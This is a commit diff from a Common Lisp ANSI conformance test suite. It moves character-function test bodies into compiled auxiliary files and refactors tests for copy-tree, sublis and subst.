[ "### Moved many functions off into compiled aux files. Added tests for error...\n\n`Moved many functions off into compiled aux files. Added tests for error handling in C*R functions. Added a test of NCONC on dotted lists. Uncommented APPEND-6 and made it run fast enough on CMUCL.`\nparent 3df83b3e\nThis diff is collapsed.\n ... ... @@ -38,5 +38,233 @@ (every #'identity (cdr args))) (t (every #'not (cdr args))))) ;;; From character.lsp (defun char-type-error-check (fn) (loop for x in *universe* always (or (characterp x) (eqt (catch-type-error (funcall fn x)) 'type-error)))) (defun standard-char.5.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'standard-char) (not (standard-char-p c))))))) (defun extended-char.3.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'extended-char) (typep c 'base-char)))))) (defun character.1.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (let ((s (string c))) (and (eqlt (character c) c) (eqlt (character s) c) (eqlt (character (make-symbol s)) c))))))) (defun character.2.body () (loop for x in *universe* when (not (or (characterp x) (and (stringp x) (eqlt (length x) 1)) (and (symbolp x) (eqlt (length (symbol-name x)) 1)) (let ((c (catch-type-error (character x)))) (or (eqlt c 'type-error) (let ((s (catch-type-error (string x)))) (and (stringp s) (eqlt (char s 0) c))))))) do (return x))) (defun characterp.2.body () (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (characterp c))))) (defun characterp.3.body () (loop for x in *universe* always (let ((p (characterp x)) (q (typep x 'character))) (if p (not (not q)) (not q))))) (defun alphanumericp.4.body () (loop for x in *universe* always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x)))))) (defun alphanumericp.5.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x)))))) (defun digit-char.1.body () (loop for r from 2 to 36 always (loop for i from 0 to 36 always (let ((c (digit-char i r))) (if (>= i r) (null c) (eqlt c (char +extended-digit-chars+ i))))))) (defun digit-char-p.1.body () (loop for x in *universe* always (not (and (characterp x) (not (alphanumericp x)) (digit-char-p x))))) (defun digit-char-p.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (not (and (not (alphanumericp x)) (digit-char-p x)))))) (defun digit-char-p.3.body () (loop for r from 2 to 35 always (loop for i from r to 35 for c = (char +extended-digit-chars+ i) never (or (digit-char-p c r) (digit-char-p (char-downcase c) r))))) (defun digit-char-p.4.body () (loop for r from 2 to 35 always (loop for i from 0 below r for c = (char +extended-digit-chars+ i) always (and (eqlt (digit-char-p c r) i) (eqlt (digit-char-p (char-downcase c) r) i))))) (defun standard-char-p.2.body () (loop for x in *universe* always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x))))) (defun standard-char-p.2a.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x))))) (defun char-upcase.1.body () (loop for x in *universe* always (or (not (characterp 
x)) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eqlt u x)) (eqlt u (char-upcase u))))))) (defun char-upcase.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eqlt u x)) (eqlt u (char-upcase u))))))) (defun char-downcase.1.body () (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eqlt u x)) (eqlt u (char-downcase u))))))) (defun char-downcase.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eqlt u x)) (eqlt u (char-downcase u))))))) (defun both-case-p.1.body () (loop for x in *universe* always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x))))))) (defun both-case-p.2.body () (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x))))))) (defun char-code.2.body () (loop for i from 0 below (min 65536 char-code-limit) for c = (code-char i) always (or (not c) (eqlt (char-code c) i)))) (defun char-int.2.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (let ((c->i (make-hash-table :test #'equal)) (i->c (make-hash-table :test #'eql))) (flet ((%insert (c) (or (not (characterp c)) (let* ((i (char-int c)) (j (gethash c c->i)) (d (gethash i i->c))) (and (or (null j) (eqlt j i)) (or (null d) (char= c d)) (progn (setf (gethash c c->i) i) (setf (gethash i i->c) c) t)))))) (and (loop for i from 0 below char-code-limit always (%insert (code-char i))) (every #'%insert +standard-chars+) (every #'%insert *universe*) t)))) (defun char-name.1.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (flet ((%check (c) (or (not (characterp c)) (let ((name (char-name c))) (or (null name) (and (stringp name) (eqlt c (name-char name)))))))) (and (loop for i from 0 below char-code-limit always (%check (code-char i))) (every #'%check +standard-chars+) (every #'%check *universe*) t))) (defun name-char.1.body () (loop for x in *universe* for s = (catch-type-error (string x)) always (or (eqlt s 'type-error) (let ((c (name-char x))) (or (not c) (characterp c) (string-equal (char-name c) s)))))) \\ No newline at end of file\n ... ... @@ -5,11 +5,6 @@ (in-package :cl-test) (defun char-type-error-check (fn) (loop for x in *universe* always (or (characterp x) (eqt (catch-type-error (funcall fn x)) 'type-error)))) (deftest character-class.1 (subtypep* 'character t) t t) ... ... @@ -43,10 +38,7 @@ t) (deftest standard-char.5 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'standard-char) (not (standard-char-p c)))))) (standard-char.5.body) t) (deftest extended-char.1 ... ... 
@@ -58,35 +50,17 @@ t t) (deftest extended-char.3 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (not (and (typep c 'extended-char) (typep c 'base-char))))) (extended-char.3.body) t) ;;; (deftest character.1 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (let ((s (string c))) (and (eql (character c) c) (eql (character s) c) (eql (character (make-symbol s)) c)))))) (character.1.body) t) (deftest character.2 (loop for x in *universe* when (not (or (characterp x) (and (stringp x) (eql (length x) 1)) (and (symbolp x) (eql (length (symbol-name x)) 1)) (let ((c (catch-type-error (character x)))) (or (eql c 'type-error) (let ((s (catch-type-error (string x)))) (and (stringp s) (eql (char s 0) c))))))) do (return x)) (character.2.body) nil) (deftest characterp.1 ... ... @@ -94,16 +68,11 @@ t) (deftest characterp.2 (loop for i from 0 below (min 65536 char-code-limit) always (let ((c (code-char i))) (or (null c) (characterp c)))) (characterp.2.body) t) (deftest characterp.3 (loop for x in *universe* always (let ((p (characterp x)) (q (typep x 'character))) (if p (not (not q)) (not q)))) (characterp.3.body) t) (deftest alpha-char-p.1 ... ... @@ -138,30 +107,15 @@ (deftest alphanumericp.4 (loop for x in *universe* always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x))))) (alphanumericp.4.body) t) (deftest alphanumericp.5 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (or (digit-char-p x) (alpha-char-p x)) (alphanumericp x) (not (alphanumericp x))))) (alphanumericp.5.body) t) (deftest digit-char.1 (loop for r from 2 to 36 always (loop for i from 0 to 36 always (let ((c (digit-char i r))) (if (>= i r) (null c) (eql c (char +extended-digit-chars+ i)))))) (digit-char.1.body) t) (deftest digit-char.2 ... ... @@ -172,36 +126,19 @@ nil nil nil nil nil nil nil nil nil nil)) (deftest digit-char-p.1 (loop for x in *universe* always (not (and (characterp x) (not (alphanumericp x)) (digit-char-p x)))) (digit-char-p.1.body) t) (deftest digit-char-p.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (not (and (not (alphanumericp x)) (digit-char-p x))))) (digit-char-p.2.body) t) (deftest digit-char-p.3 (loop for r from 2 to 35 always (loop for i from r to 35 for c = (char +extended-digit-chars+ i) never (or (digit-char-p c r) (digit-char-p (char-downcase c) r)))) (digit-char-p.3.body) t) (deftest digit-char-p.4 (loop for r from 2 to 35 always (loop for i from 0 below r for c = (char +extended-digit-chars+ i) always (and (eql (digit-char-p c r) i) (eql (digit-char-p (char-downcase c) r) i)))) (digit-char-p.4.body) t) (deftest digit-char-p.5 ... ... @@ -214,12 +151,12 @@ (deftest digit-char-p.6 (loop for i from 0 below 10 for c = (char +extended-digit-chars+ i) always (eql (digit-char-p c) i)) always (eqlt (digit-char-p c) i)) t) (deftest graphic-char-p.1 (loop for c across +standard-chars+ always (if (eql c #\\Newline) always (if (eqlt c #\\Newline) (not (graphic-char-p c)) (graphic-char-p c))) t) ... ... 
@@ -240,18 +177,11 @@ t) (deftest standard-char-p.2 (loop for x in *universe* always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x)))) (standard-char-p.2.body) t) (deftest standard-char-p.2a (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (find x +standard-chars+) (not (standard-char-p x)))) (standard-char-p.2a.body) t) (deftest standard-char-p.3 ... ... @@ -259,24 +189,11 @@ t) (deftest char-upcase.1 (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eql u x)) (eql u (char-upcase u)))))) (char-upcase.1.body) t) (deftest char-upcase.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-upcase x))) (and (or (lower-case-p x) (eql u x)) (eql u (char-upcase u)))))) (char-upcase.2.body) t) (deftest char-upcase.3 ... ... @@ -288,24 +205,11 @@ t) (deftest char-downcase.1 (loop for x in *universe* always (or (not (characterp x)) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eql u x)) (eql u (char-downcase u)))))) (char-downcase.1.body) t) (deftest char-downcase.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not x) (let ((u (char-downcase x))) (and (or (upper-case-p x) (eql u x)) (eql u (char-downcase u)))))) (char-downcase.2.body) t) (deftest char-downcase.3 ... ... @@ -345,26 +249,11 @@ t) (deftest both-case-p.1 (loop for x in *universe* always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x)))))) (both-case-p.1.body) t) (deftest both-case-p.2 (loop for i from 0 below (min 65536 char-code-limit) for x = (code-char i) always (or (not (characterp x)) (if (both-case-p x) (and (graphic-char-p x) (or (upper-case-p x) (lower-case-p x))) (not (or (upper-case-p x) (lower-case-p x)))))) (both-case-p.2.body) t) (deftest both-case-p.3 ... ... 
@@ -376,70 +265,23 @@ t) (deftest char-code.2 (loop for i from 0 below (min 65536 char-code-limit) for c = (code-char i) always (or (not c) (eql (char-code c) i))) (char-code.2.body) t) (deftest code-char.1 (loop for x across +standard-chars+ always (eql (code-char (char-code x)) x)) always (eqlt (code-char (char-code x)) x)) t) (deftest char-int.1 (loop for x across +standard-chars+ always (eql (char-int x) (char-code x))) t) (defun char-int.2.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (let ((c->i (make-hash-table :test #'equal)) (i->c (make-hash-table :test #'eql))) (flet ((%insert (c) (or (not (characterp c)) (let* ((i (char-int c)) (j (gethash c c->i)) (d (gethash i i->c))) (and (or (null j) (eql j i)) (or (null d) (char= c d)) (progn (setf (gethash c c->i) i) (setf (gethash i i->c) c) t)))))) (and (loop for i from 0 below char-code-limit always (%insert (code-char i))) (every #'%insert +standard-chars+) (every #'%insert *universe*) t)))) (eval-when (load eval) (compile 'char-int.2.fn)) always (eqlt (char-int x) (char-code x))) t) (deftest char-int.2 (char-int.2.fn) t) (defun char-name.1.fn () (declare (optimize (safety 3) (speed 1) (space 1))) (flet ((%check (c) (or (not (characterp c)) (let ((name (char-name c))) (or (null name) (and (stringp name) (eql c (name-char name)))))))) (and (loop for i from 0 below char-code-limit always (%check (code-char i))) (every #'%check +standard-chars+) (every #'%check *universe*) t))) (eval-when (load eval) (compile 'char-name.1.fn)) (deftest char-name.1 (char-name.1.fn) t) ... ... @@ -475,19 +317,7 @@ t) (deftest name-char.1 (funcall (compile nil '(lambda () (declare (safety 3) (speed 1) (space 1)) (notnot (loop for x in *universe* for s = (catch-type-error (string x)) always (or (eql s 'type-error) (let ((c (name-char x))) (or (not c) (characterp c) (string-equal (char-name c) s))))))))) (name-char.1.body) t) (deftest name-char.2 ... ... @@ -498,5 +328,5 @@ (c2 (name-char (string-downcase s))) (c3 (name-char (string-capitalize s))) (c4 (name-char s))) (and (eql c1 c2) (eql c2 c3) (eql c3 c4)))) (and (eqlt c1 c2) (eqlt c2 c3) (eqlt c3 c4)))) t)\n ... ... @@ -322,7 +322,6 @@ (cddddr *cons-test-4*) p) ;; Test rplaca, rplacd (deftest rplaca-1 ... ...\n ... ... @@ -11,18 +11,6 @@ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; copy-tree (defun check-cons-copy (x y) \"Check that the tree x is a copy of the tree y, returning t iff it is.\" (cond ((consp x) (and (consp y) (not (eqt x y)) (check-cons-copy (car x) (car y)) (check-cons-copy (cdr x) (cdr y)))) ((eqt x y) t) (t nil))) ;; Try copy-tree on a tree containing elements of various kinds (deftest copy-tree-1 (let ((x (cons 'a (list (cons 'b 'c) ... ... @@ -41,26 +29,6 @@ (check-cons-copy x y))) t) ;; Check sublis (defun check-sublis (a al &key (key 'no-key) test test-not) \"Apply sublis al a with various keys. Check that the arguments are not themselves changed. Return nil if the arguments do get changed.\" (setf a (copy-tree a)) (setf al (copy-tree al)) (let ((acopy (make-scaffold-copy a)) (alcopy (make-scaffold-copy al))) (let ((as (apply #'sublis al a `(,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not)) ,@(unless (eqt key 'no-key) `(:key ,key)))))) (and (check-scaffold-copy a acopy) (check-scaffold-copy al alcopy) as)))) (deftest sublis-1 (check-sublis '((a b) g (d e 10 g h) 15 . g) '((e . e2) (g . 17))) ... ... 
@@ -121,18 +89,6 @@ ;; nsublis (defun check-nsublis (a al &key (key 'no-key) test test-not) \"Apply nsublis al a, copying these arguments first.\" (setf a (copy-tree a)) (setf al (copy-tree al)) (let ((as (apply #'sublis (copy-tree al) (copy-tree a) `(,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not)) ,@(unless (eqt key 'no-key) `(:key ,key)))))) as)) (deftest nsublis-1 (check-nsublis '((a b) g (d e 10 g h) 15 . g) '((e . e2) (g . 17))) ... ... @@ -197,29 +153,6 @@ (check-sublis a '((a . b) (b . a)))) ((b a) (b a))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check subst (defun check-subst (new old tree &key (key 'no-key) test test-not) \"Call subst new old tree, with keyword arguments if present. Check that the arguments are not changed.\" (setf new (copy-tree new)) (setf old (copy-tree old)) (setf tree (copy-tree tree)) (let ((newcopy (make-scaffold-copy new)) (oldcopy (make-scaffold-copy old)) (treecopy (make-scaffold-copy tree))) (let ((result (apply #'subst new old tree `(,@(unless (eqt key 'no-key) `(:key ,key)) ,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not)))))) (and (check-scaffold-copy new newcopy) (check-scaffold-copy old oldcopy) (check-scaffold-copy tree treecopy) result)))) (defvar *subst-tree-1* '(10 (30 20 10) (20 10) (10 20 30 40))) (deftest subst-1 ... ... @@ -276,42 +209,6 @@ :key nil) (a a c d a a)) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check subst-if, subst-if-not (defun check-subst-if (new pred tree &key (key 'no-key)) \"Call subst-if new pred tree, with various keyword arguments if present. Check that the arguments are not changed.\" (setf new (copy-tree new)) (setf tree (copy-tree tree)) (let ((newcopy (make-scaffold-copy new)) (predcopy (make-scaffold-copy pred)) (treecopy (make-scaffold-copy tree))) (let ((result (apply #'subst-if new pred tree (unless (eqt key 'no-key) `(:key ,key))))) (and (check-scaffold-copy new newcopy) (check-scaffold-copy pred predcopy) (check-scaffold-copy tree treecopy) result)))) (defun check-subst-if-not (new pred tree &key (key 'no-key)) \"Call subst-if-not new pred tree, with various keyword arguments if present. Check that the arguments are not changed.\" (setf new (copy-tree new)) (setf tree (copy-tree tree)) (let ((newcopy (make-scaffold-copy new)) (predcopy (make-scaffold-copy pred)) (treecopy (make-scaffold-copy tree))) (let ((result (apply #'subst-if-not new pred tree (unless (eqt key 'no-key) `(:key ,key))))) (and (check-scaffold-copy new newcopy) (check-scaffold-copy pred predcopy) (check-scaffold-copy tree treecopy) result)))) (deftest subst-if-1 (check-subst-if 'a #'consp '((100 1) (2 3) (4 3 2 1) (a b c))) A) ... ... @@ -384,19 +281,6 @@ :key nil) ((a) (a) (c) (d))) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check nsubst (defun check-nsubst (new old tree &key (key 'no-key) test test-not) \"Call nsubst new old tree, with keyword arguments if present.\" (setf new (copy-tree new)) (setf old (copy-tree old)) (setf tree (copy-tree tree)) (apply #'nsubst new old tree `(,@(unless (eqt key 'no-key) `(:key ,key)) ,@(when test `(:test ,test)) ,@(when test-not `(:test-not ,test-not))))) (defvar *nsubst-tree-1* '(10 (30 20 10) (20 10) (10 20 30 40))) (deftest nsubst-1 ... ... 
@@ -454,23 +338,6 @@ (a a c d a a)) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;; Check nsubst-if, nsubst-if-not (defun check-nsubst-if (new pred tree &key (key 'no-key)) \"Call nsubst-if new pred tree, with keyword arguments if present.\" (setf new (copy-tree new)) (setf tree (copy-tree tree)) (apply #'nsubst-if new pred tree (unless (eqt key 'no-key) `(:key ,key))))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9338403,"math_prob":0.918777,"size":319,"snap":"2020-10-2020-16","text_gpt3_token_len":77,"char_repetition_ratio":0.13333334,"word_repetition_ratio":0.2857143,"special_character_ratio":0.21316615,"punctuation_ratio":0.140625,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99396354,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-03T00:20:07Z\",\"WARC-Record-ID\":\"<urn:uuid:d4117264-c278-4980-b828-ae4117691bee>\",\"Content-Length\":\"1049648\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:07cc753c-06b0-4956-a1cb-6c1237a93547>\",\"WARC-Concurrent-To\":\"<urn:uuid:14a6582b-ffde-4515-9ac7-d07276d22b8f>\",\"WARC-IP-Address\":\"148.251.248.130\",\"WARC-Target-URI\":\"https://gitlab.common-lisp.net/gpalter/ansi-test/commit/2f8353ca0fd1b428cc32758854ebfe65fca26d47\",\"WARC-Payload-Digest\":\"sha1:H3DEFPXQEBQ6GQDG776CEJNO6F5MNAGZ\",\"WARC-Block-Digest\":\"sha1:TW6SFINVQIXAJECJC6OFYKN77KMXVHCK\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370509103.51_warc_CC-MAIN-20200402235814-20200403025814-00056.warc.gz\"}"}
https://doc.cgal.org/4.14/AABB_tree/classAABBRayIntersectionTraits.html
[ "", null, "CGAL 4.14 - 3D Fast Intersection and Distance Computation (AABB Tree)\nAABBRayIntersectionTraits Concept Reference\n\n## Definition\n\nThe concept AABBRayIntersectionTraits is a refinement of the concept AABBTraits. In addition to the types and functions required by AABBTraits it also requires function objects to calculate the distance of an intersection along a ray.\n\nHas Models:\nCGAL::AABB_traits<AABBGeomTraits,AABBPrimitive>\nCGAL::AABB_traits<AABBGeomTraits,AABBPrimitive>\nCGAL::AABB_tree<AABBTraits>\nAABBPrimitive\n\n## Public Types\n\ntypedef unspecified_type Ray_3\nType of a 3D ray.\n\ntypedef unspecified_type Intersection_distance\nA functor object to compute the distance between the source of a ray and its closest intersection point between the ray and a primitive or a bounding box. More...\n\n## Public Member Functions\n\nIntersection_distance intersection_distance_object () const\nReturns the intersection distance functor.\n\n## ◆ Intersection_distance\n\nA functor object to compute the distance between the source of a ray and its closest intersection point between the ray and a primitive or a bounding box.\n\nAn empty boost::optional is returned, if there is no intersection. When there is an intersection, an object of type FT is returned such that if i1 and i2 are two intersection points, then i1 is closer to the source of the ray than i2 iff n1 < n2, n1 and n2 being the numbers returned for i1 and i2 respectively.\n\nProvides the operators: boost::optional<FT> operator()(const Ray_3& r, const Bounding_box& bbox). boost::optional<std::pair<FT, Intersection_and_primitive_id<Ray_3>::Type > > operator()(const Ray_3& r, const Primitive& primitive).\n\nA common algorithm to compute the intersection between a bounding box and a ray is the slab method." ]
[ null, "https://doc.cgal.org/4.14/Manual/search/mag_sel.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8196511,"math_prob":0.96041465,"size":1512,"snap":"2022-05-2022-21","text_gpt3_token_len":355,"char_repetition_ratio":0.16445623,"word_repetition_ratio":0.20627803,"special_character_ratio":0.21693122,"punctuation_ratio":0.124060154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9690864,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T06:59:37Z\",\"WARC-Record-ID\":\"<urn:uuid:90dcc6f7-f8ca-4d64-86ee-249170e4f1e6>\",\"Content-Length\":\"15112\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:57f25291-7fa8-41a6-986c-0615df790df3>\",\"WARC-Concurrent-To\":\"<urn:uuid:7ed6c723-0c4e-4dc3-85b4-237ec7aa5f12>\",\"WARC-IP-Address\":\"213.186.33.40\",\"WARC-Target-URI\":\"https://doc.cgal.org/4.14/AABB_tree/classAABBRayIntersectionTraits.html\",\"WARC-Payload-Digest\":\"sha1:PAWYHZJT2OA3XU26K5GRILSR4KXKCFMH\",\"WARC-Block-Digest\":\"sha1:6N4K73IIAOUDUKETTKVSKCNXCK6B36VP\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662604495.84_warc_CC-MAIN-20220526065603-20220526095603-00665.warc.gz\"}"}
https://www.boost.org/doc/libs/1_76_0/libs/mpl/doc/refmanual/replace.html
[ "#", null, "Boost C++ Libraries\n\n...one of the most highly regarded and expertly designed C++ library projects in the world.\n\n |  |  | Full TOC Front Page / Algorithms / Transformation Algorithms / replace\n\n# replace\n\n### Synopsis\n\n```template<\ntypename Sequence\n, typename OldType\n, typename NewType\n, typename In = unspecified\n>\nstruct replace\n{\ntypedef unspecified type;\n};\n```\n\n### Description\n\nReturns a copy of the original sequence where every type identical to OldType has been replaced with NewType.\n\n[Note: This wording applies to a no-inserter version(s) of the algorithm. See the Expression semantics subsection for a precise specification of the algorithm's details in all cases — end note]\n\n```#include <boost/mpl/replace.hpp>\n```\n\n### Model of\n\nReversible Algorithm\n\n### Parameters\n\nParameter Requirement Description\nSequence Forward Sequence A original sequence.\nOldType Any type A type to be replaced.\nNewType Any type A type to replace with.\nIn Inserter An inserter.\n\n### Expression semantics\n\nThe semantics of an expression are defined only where they differ from, or are not defined in Reversible Algorithm.\n\nFor any Forward Sequence s, an Inserter in, and arbitrary types x and y:\n\n```typedef replace<s,x,y,in>::type r;\n```\nReturn type: A type. Equivalent to ```typedef replace_if< s,y,is_same<_,x>,in >::type r; ```\n\n### Complexity\n\nLinear. Performs exactly size<s>::value comparisons for identity / insertions.\n\n### Example\n\n```typedef vector<int,float,char,float,float,double> types;\ntypedef vector<int,double,char,double,double,double> expected;\ntypedef replace< types,float,double >::type result;\n\nBOOST_MPL_ASSERT(( equal< result,expected > ));\n```" ]
[ null, "https://www.boost.org/gfx/space.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6170444,"math_prob":0.6575001,"size":1521,"snap":"2022-27-2022-33","text_gpt3_token_len":351,"char_repetition_ratio":0.12722479,"word_repetition_ratio":0.009756098,"special_character_ratio":0.22419462,"punctuation_ratio":0.21678321,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95976174,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T19:57:01Z\",\"WARC-Record-ID\":\"<urn:uuid:5766ac36-9550-4ee0-8573-1c12ab78ca31>\",\"Content-Length\":\"10569\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5f896070-71da-477c-94a9-91b0697a0e0a>\",\"WARC-Concurrent-To\":\"<urn:uuid:87cda664-5281-4d6f-9077-268e18c8b7ba>\",\"WARC-IP-Address\":\"146.20.110.251\",\"WARC-Target-URI\":\"https://www.boost.org/doc/libs/1_76_0/libs/mpl/doc/refmanual/replace.html\",\"WARC-Payload-Digest\":\"sha1:Q5F7SQLQ52TI3CNDLKF7X7KFQFMSLQOF\",\"WARC-Block-Digest\":\"sha1:YI4D2CUCPV3FWCG272E5FFLSLH77T7U2\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104597905.85_warc_CC-MAIN-20220705174927-20220705204927-00021.warc.gz\"}"}
https://docs.scipy.org/doc/scipy-1.6.1/reference/generated/scipy.interpolate.UnivariateSpline.get_residual.html
[ "# scipy.interpolate.UnivariateSpline.get_residual¶\n\nUnivariateSpline.get_residual(self)[source]\n\nReturn weighted sum of squared residuals of the spline approximation.\n\nThis is equivalent to:\n\nsum((w[i] * (y[i]-spl(x[i])))**2, axis=0)\n\n\n#### Previous topic\n\nscipy.interpolate.UnivariateSpline.get_knots\n\n#### Next topic\n\nscipy.interpolate.UnivariateSpline.integral" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6146314,"math_prob":0.8402605,"size":272,"snap":"2021-21-2021-25","text_gpt3_token_len":70,"char_repetition_ratio":0.1641791,"word_repetition_ratio":0.0,"special_character_ratio":0.20588236,"punctuation_ratio":0.22916667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9777464,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-11T06:31:26Z\",\"WARC-Record-ID\":\"<urn:uuid:484c54dc-c8c2-4e3c-a6d0-839b832c4317>\",\"Content-Length\":\"7471\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:686bd9e6-f278-416d-83fc-8fca8bc9799c>\",\"WARC-Concurrent-To\":\"<urn:uuid:a1246dac-9280-4470-93cc-db13940211a2>\",\"WARC-IP-Address\":\"50.17.248.72\",\"WARC-Target-URI\":\"https://docs.scipy.org/doc/scipy-1.6.1/reference/generated/scipy.interpolate.UnivariateSpline.get_residual.html\",\"WARC-Payload-Digest\":\"sha1:I3E6LLRK72OK6CGXTETFG44XU7THICEM\",\"WARC-Block-Digest\":\"sha1:LECW4SCMU6GAFXU4ATTRCMEQDOSJOVZJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991904.6_warc_CC-MAIN-20210511060441-20210511090441-00346.warc.gz\"}"}
https://help.agi.com/STKComponentsJava/Javadoc/agi-foundation-coordinates-EulerSequence.html
[ "agi.foundation.coordinates\n(agi.foundation.core-2023r1.jar)\n\n## Class EulerSequence\n\n• All Implemented Interfaces:\nIEquatable<EulerSequence>, ImmutableValueType, ValueType, IEquatableEpsilon<EulerSequence>\n\n```public final class EulerSequence\nextends Object\nimplements IEquatable<EulerSequence>, IEquatableEpsilon<EulerSequence>, ImmutableValueType```\n\nRepresents a rotation as a sequence of three `ElementaryRotations` about consecutive axes. The first elementary rotation results in an intermediate orientation and associated set of axes from which the second elementary rotation is performed. Likewise, the third elementary rotation is performed from the intermediate orientation and set of axes which result from the second rotation.\n\nA 321 Euler sequence is commonly used to represent yaw about the z-axis, followed by pitch about the resulting y-axis, and then roll about the resulting x-axis when expressing the attitude of a vehicle relative to some reference orientation.\n\nA 321 Euler sequence can be used to express the yaw (heading), pitch (elevation), and roll (bank) orientation of the vehicle body axis relative to the local `North-East-Down` axes of the vehicle. To obtain these angles, use a 321 `EulerSequence` as shown below:\n\n``````Point myVehiclePoint = propagator.createPoint();\nEarthCentralBody earth = CentralBodiesFacet.getFromContext().getEarth();\nAxesNorthEastDown ned = new AxesNorthEastDown(earth, myVehiclePoint);\nVector surfaceNormal = new VectorEllipsoidSurfaceNormal(earth.getShape(), earth.getFixedFrame(), myVehiclePoint);\nAxesAlignedConstrained vehicleBodyAxes = new AxesAlignedConstrained(\nnew VectorVelocity(myVehiclePoint, earth.getFixedFrame()), AxisIndicator.FIRST,\nnew VectorInverted(surfaceNormal), AxisIndicator.THIRD);\n\nAxesEvaluator rotationEvaluator = GeometryTransformer.getAxesTransformation(ned, vehicleBodyAxes);\n\nUnitQuaternion ned2body = rotationEvaluator.evaluate(propagator.getTimeInterval().getStart());\n\nEulerSequence yawPitchRoll = new 